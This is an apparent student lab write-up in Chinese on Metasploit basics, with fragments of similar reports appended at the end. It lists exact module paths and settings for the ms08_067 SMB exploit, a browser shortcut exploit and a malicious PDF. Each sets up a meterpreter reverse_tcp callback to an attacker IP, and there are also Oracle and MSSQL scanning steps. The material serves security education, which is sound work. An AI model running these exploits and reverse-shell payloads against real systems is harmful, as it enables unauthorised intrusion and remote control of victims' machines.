EXP5 MSF基礎應用

2021-09-25 06:45:31 字數 3066 閱讀 7001

一、實驗內容

(1)乙個主動攻擊,如ms08_067;

(2) 乙個針對瀏覽器的攻擊,如ms11_050;

(3)乙個針對客戶端的攻擊,如adobe;

(4)成功應用任何乙個輔助模組。

二、實驗步驟

(一)windows服務滲透攻擊(ms08-067漏洞攻擊)

1.使攻擊機與靶機相互ping通

2.啟動msf終端。

使用search命令搜尋該漏洞對應的模組:

啟用該滲透攻擊模組,選擇執行後門回連控制端的攻擊載荷,配置滲透攻擊所需的配置項:

啟用 :use exploit/windows/smb/ms08_067_netapi 

設定滲透目標ip: set rhost 10.1.1.236 

設定攻擊機埠: set lport 4319 

設定攻擊機ip: set lhost 10.1.1.242 

設定目標系統型別: set target 0 

3.發起滲透攻擊顯示攻擊成功後,在攻擊機上執行ipconfig命令驗證結果,可以執行:

(二)瀏覽器滲透攻擊(ms10_046漏洞攻擊)

1.啟動msf終端,使用search命令搜尋該漏洞對應的模組:

2. 啟用該滲透攻擊模組 use exploit/windows/browser/ms10_046_shortcut_icon_dlloader 

選擇執行後門回連控制端的攻擊載荷,用 show payloads

設定攻擊載荷為: set paylod windows/meterpreter/reverse_tcp 

配置滲透攻擊所需的配置項: show options 

設定埠: set lport 4319 

設定靶機ip: set lhost 192.168.42.134 

設定完成後鍵入 exploit 發起攻擊:

3.在靶機中啟動ie瀏覽器,訪問鏈結

在攻擊機msf終端中可以看到如下資訊:

可以看到從靶機傳來的很多資料。

而在靶機的網頁上回生成兩個檔案:

.使用sessions-l命令檢視當前監聽端的活動會話。

執行 sessions  命令,檢視當前的會話資訊

(三)adobe閱讀器滲透攻擊

1.使攻擊機與靶機相互ping通

2.啟動msf終端。

配置滲透攻擊所需的配置項:

設定載荷: set payload windows/meterpreter/reverse_tcp 

設定攻擊機ip: set lhost 10.1.1.242 

設定埠: set lport 8443 

設定產生的檔案: set filename 4319.pdf 

設定完成後鍵入 exploit :

根據路徑找到該pdf檔案放到靶機裡。

.使用命令 back 退出當前模組,啟動乙個對應於載荷的監聽端,等待靶機回連,並執行 exploit :

執行到這一步發現本機未安裝adobe。

借了同學的電腦完成後續的操作。

在靶機中雙擊開啟該檔案,監聽端接到來自靶機的meterpreter連線,輸入命令 sysinfo 

可以查詢靶機環境,攻擊成功。

(四)oracle資料庫服務查點

1.使用  use auxiliary/scanner/oracle/tnslsnr_version  模組查詢網路中開發埠的oracle***服務。

設定掃瞄區段: set rhost 172.30.4.0/24 

設定執行緒: set threads 50 

使用命令run,開始執行掃瞄。但在網路中未發現後台伺服器上開放的oracle資料庫。

(五)mssql掃瞄

ms sql安裝後,預設監聽在tcp埠1433或使用隨機的動態tcp埠。隨機情況下,使用mssql_ping模組,獲取隨機的tcp埠。

1.使用  use auxiliary/scanner/oracle/tnslsnr_version 模組

設定掃瞄區段: set rhost 172.30.4.0/24 

設定執行緒: set threads 50 

執行命令run開始掃瞄,未發現資料庫。

三、實驗心得

這次實驗為漏洞攻擊,需要安裝一些外掛程式,在進行使用adobe客戶端攻擊的時候我才發現本機並未安裝這個軟體以至於做了很久沒出結果,非常尷尬。本次實驗還需要注意的是準確呼叫msf的各個模組,之前又一次操作本來是要建立乙個pdf檔案,卻輸入錯誤為生成乙個**。還有就是要注意攻擊機和靶機的ip位址不能記反。

Exp5 MSF基礎應用

實驗內容 1,乙個主動攻擊例項,ms17 010 攻擊機kali 靶機 win7 使用這個exploit直接攻擊靶機 首先找到模組的位置 show 語句看看需要配置什麼 然後進行配置,最主要的是目標主機的ip位址 134是kali,136是win7 進行攻擊 這個exploit可太強了,一開始試了好...

20154324 劉康權Exp5 MSF基礎應用

乙個主動攻擊實踐 乙個針對瀏覽器的攻擊 乙個針對客戶端的攻擊 成功應用任何乙個輔助模組 1.1首先進入msf平台,查詢這個漏洞,可以看到他的具體目錄來進行使用 1.2使用這個漏洞可以使用show payloads檢視可以使用的payload,選擇乙個use後,可以通過show options檢視需要...

20155210 Exp5 MSF基礎應用

如圖 如圖 set rhost 192.168.241.138 set lhost 192.168.241.134 set lport 5210 進行配置 如圖 如圖 如圖 set srvhost 192.168.241.134 set lhost 192.168.241.134 set lport...